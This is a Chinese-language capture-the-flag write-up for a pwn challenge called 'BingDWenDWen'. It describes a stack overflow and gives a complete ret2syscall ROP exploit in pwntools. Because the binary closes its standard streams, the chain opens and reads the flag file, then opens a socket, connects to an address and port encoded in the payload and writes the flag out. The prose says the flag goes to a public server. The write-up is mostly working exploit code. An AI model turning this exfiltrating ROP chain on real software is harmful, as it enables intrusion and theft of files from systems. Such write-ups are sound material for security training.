BingDWenDWen
<p>[TOC]</p>
<h1>分析</h1>
<p><img src="https://pic.imgdb.cn/item/63b030a22bbf0e7994fda482.png" alt="" /> </p>
<p>存在溢出点</p>
<p><img src="https://pic.imgdb.cn/item/63b030df2bbf0e7994fe5dea.png" alt="" /> </p>
<p>而且给定了syscall,多半是ret2syscall<img src="https://pic.imgdb.cn/item/63b031492bbf0e7994fff095.png" alt="" /></p>
<p>程序包含了很多gadget可以直接使用,由于程序关闭了stdin、stdout和stderr,所以想办法构造socket,将flag写到公网服务器上</p>
<p>构思payload</p>
<pre><code>payload = p16(2) + p16(9999, endian="big") + p32(0x7f000001, endian="big") + p64(0)
# open("flag", 0, 0)
payload += p64(pop_rdx) + p64(0) + p64(pop_rsi) + p64(0)
payload += p64(pop_rdi) + p64(0x403700+0x178) + p64(pop_rax) + p64(2)
payload += p64(syscall)
# read(0, buf, 0x50)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(0) + p64(syscall)
# socket(2, 1, 6)
payload += p64(pop_rdi) + p64(2) + p64(pop_rsi) + p64(1) + p64(pop_rdx) + p64(6)
payload += p64(pop_rax) + p64(41) + p64(syscall)
# connect(1, &addr, 0x10)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700) + p64(pop_rdx) + p64(0x10)
payload += p64(pop_rax) + p64(42) + p64(syscall)
# write(1, buf, 0x50)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(1) + p64(syscall)
payload = payload.ljust(0x150, 'a')
payload += "flag\x00\x00\x00"</code></pre>
<h1>Exploit</h1>
<pre><code>from pwn import*
o = process("./pwn")
pop_rax = 0x000000000040135a
pop_rdi = 0x0000000000401356
pop_rsi = 0x0000000000401358
pop_rdx = 0x0000000000401354
syscall = 0x401351
payload = p16(2) + p16(9999, endian="big") + p32(0x7f000001, endian="big") + p64(0)
payload += p64(pop_rdx) + p64(0) + p64(pop_rsi) + p64(0)
payload += p64(pop_rdi) + p64(0x403700+0x178) + p64(pop_rax) + p64(2)
payload += p64(syscall)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(0) + p64(syscall)
payload += p64(pop_rdi) + p64(2) + p64(pop_rsi) + p64(1) + p64(pop_rdx) + p64(6)
payload += p64(pop_rax) + p64(41) + p64(syscall)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700) + p64(pop_rdx) + p64(0x10)
payload += p64(pop_rax) + p64(42) + p64(syscall)
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(0x403700+0x180) + p64(pop_rdx) + p64(0x50)
payload += p64(pop_rax) + p64(1) + p64(syscall)
payload = payload.ljust(0x170, 'a')
payload += "flag\x00\x00\x00"
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic.imgdb.cn/item/63b036ee2bbf0e799416020a.png" alt="" /></p>